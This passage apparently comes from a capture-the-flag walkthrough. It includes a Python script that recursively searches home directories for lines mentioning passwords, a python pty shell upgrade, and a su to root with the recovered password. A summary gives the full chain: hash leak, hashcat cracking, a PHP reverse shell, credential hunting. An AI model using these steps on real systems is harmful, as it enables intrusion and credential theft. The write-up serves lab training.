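    with open(os.path.join(note_dir, "481bca0d-7206-45dd-a459-a72ea1131329.note"), "w") as fh:
        fh.write(SAMPLE_NOTE)
    os.makedirs(os.path.join(base, "andy"))
    with open(os.path.join(base, "andy", "todo.txt"), "w") as fh:
        fh.write("buy milk\ncall the office\n")
    with open(os.path.join(base, "andy", "photo.bin"), "wb") as fh:
        fh.write(b"\x00\x01password\x02\xff")   # binary: contains NUL, must be skipped


def is_text_file(path: str, sample_size: int = 4096) -> bool:
    with open(path, "rb") as fh:
        return b"\x00" not in fh.read(sample_size)


def find_credential_mentions(root_dir: str):
    """Equivalent of `grep -R -i pass`: collect (relative path, line number, line)
    for every text-file line that mentions a credential keyword."""
    hits = []
    for dirpath, _dirs, files in os.walk(root_dir):
        for name in files:
            path = os.path.join(dirpath, name)
            if os.path.islink(path) or not is_text_file(path):
                continue
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                for lineno, line in enumerate(fh, start=1):
                    if CREDENTIAL_RE.search(line):
                        hits.append((os.path.relpath(path, root_dir), lineno, line.rstrip("\n")))
    return hits


def tomboy_note_text(path: str):
    """Return (title, body) from a Tomboy note; the body is the text of
    <note-content>, which is where the secret sits in the file above."""
    root = ET.parse(path).getroot()
    title = root.findtext(f"{TOMBOY_NS}title", default="")
    content = root.find(f"{TOMBOY_NS}text/{TOMBOY_NS}note-content")
    body = "".join(content.itertext()) if content is not None else ""
    return title, body


def run_demo() -> dict:
    with tempfile.TemporaryDirectory() as home:
        build_sample_home(home)
        hits = find_credential_mentions(home)
        note_hits = sorted({p for p, _, _ in hits if p.endswith(".note")})
        title, body = tomboy_note_text(os.path.join(home, note_hits[0]))
        return {
            "files_with_hits": sorted({p for p, _, _ in hits}),
            "note_title": title,
            "note_last_line": body.strip().splitlines()[-1],
        }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

Pointing find_credential_mentions at a real /home lists which files to review by hand; the binary check keeps images and archives out of the report, and symlinks are skipped so a link into /proc or a device does not hang the scan.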

Good; log in as root with this password, 50$cent.

This shell is not interactive enough, so we can't switch to root directly:

bash-3.2$ su -
standard in must be a tty

Try upgrading the shell with python, although we don't yet know whether the machine has python installed.

It turns out python is there:

bash-3.2$ python --version
Python 2.5.1

The current shell is /bin/bash and can't complete the root login, so use python to spawn a /bin/sh shell:

bash-3.2$ python -c "import pty;pty.spawn('/bin/sh')"
sh-3.2$ 

It worked:

sh-3.2$ su -
su -
Password: 50$cent

[root@localhost ~]# whoami
whoami
root
[root@localhost ~]# 

We really do have root now, with full privileges:

[root@localhost ~]# whoami
whoami
root
[root@localhost ~]# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
    link/ether 00:0c:29:ab:b8:24 brd ff:ff:ff:ff:ff:ff
    inet 192.168.50.155/24 brd 192.168.50.255 scope global eth1
    inet6 fe80::20c:29ff:feab:b824/64 scope link 
       valid_lft forever preferred_lft forever
[root@localhost ~]# id
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=system_u:system_r:httpd_t:s0
[root@localhost ~]# sudo -l
sudo -l
User root may run the following commands on this host:
    (ALL) ALL
[root@localhost ~]# 

Summary

nmap scan: hosts, ports, vulnerability scripts
Visit port 80; the web site runs a CMS
Search the web for exploits for the CMS; found an information disclosure that gives the MD5 of the CMS admin password
Crack the MD5 with hashcat using the rockyou wordlist
Obtained the plaintext password shannon and logged in to the admin panel with it
The admin panel can edit pages and accepts PHP code in them, so wrote a reverse shell
Got an initial shell as user apache
passwd shows many users
Check history files and other sensitive files for leaked information
Use grep to search recursively and case-insensitively for the string pass in the users' home directories /home/*
Found the password, upgraded the shell with python, logged in as root, done
End

Open threads

The machine has many open ports, so there are probably other solutions, and they may be just as simple...
